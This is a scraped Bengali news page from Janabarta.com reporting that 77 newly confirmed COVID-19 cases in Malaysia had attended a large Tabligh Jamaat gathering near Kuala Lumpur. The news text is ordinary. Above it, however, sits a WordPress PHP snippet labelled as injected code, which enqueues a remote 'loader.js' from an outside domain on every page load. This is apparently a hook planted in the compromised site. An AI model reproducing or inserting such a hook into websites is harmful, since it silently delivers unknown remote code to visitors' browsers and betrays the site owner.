// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site মালয়েশিয়ায় ইজতেমায় অংশ নেওয়া ৭৭ জন করোনায় আক্রান্ত - Janabarta.com

মালয়েশিয়ায় ইজতেমায় অংশ নেওয়া ৭৭ জন করোনায় আক্রান্ত

জনবার্তা অনলাইনঃ মালয়েশিয়ায় নতুন করে ১৯০ জন করোনাভাইরাসে আক্রান্ত হয়েছেন। এ নিয়ে দেশটিতে করোনায় আক্রান্তের সংখ্যা দাঁড়ালো ৪২৮ জনে। রোববার দেশটির স্বাস্থ্য মন্ত্রণালয় এই তথ্য নিশ্চিত করেছে। খবর দ্যা স্ট্রেইট টাইমসের

মালয়েশিয়ার স্বাস্থ্যমন্ত্রী ডাতুক সেরি ডা. আধাম বাবা বলেন, গত ২৭ ফেব্রুয়ারি থেকে ১ মার্চ পর্যন্ত রাজধানী কুয়ালালামপুরের কাছের একটি মসজিদে তাবলীগ জামাতের ইজতেমা অনুষ্ঠিত হয়েছে। এই সমাবেশে বিশ্বের বিভিন্ন দেশের প্রায় ১৬ হাজার মানুষ অংশ নেন। নতুন করে করোনায় আক্রান্তদের ৭৭ জন এই ইজতেমায় অংশ নিয়েছিলেন। 

তিনি বলেন, মন্ত্রণালয় এখন সেদিনের তাবলীগ জামাতের কর্মসূচিতে যারা অংশ নিয়েছিল তাদের বিষয়ে খোঁজ-খবর নিচ্ছে। যারা সেখানে গিয়েছিলেন তাদের আরও নির্দেশাবলীর জন্য নিকটতম জেলা স্বাস্থ্য দফতরে যোগাযোগের অনুরোধ করছি। তাদের করোনার বিস্তার রোধে কর্তৃপক্ষকে সহযোগিতা করার আহ্বান জানাচ্ছি।

ডা. আধাম বাবা বলেন, ইজতেমায় অংশগ্রহণকারী এবং তাদের নিবিড় সংস্পর্শে আসা সবাইকে বাধ্যতামূলক ১৪ দিনের কোয়ারেন্টিনে থাকতে হবে।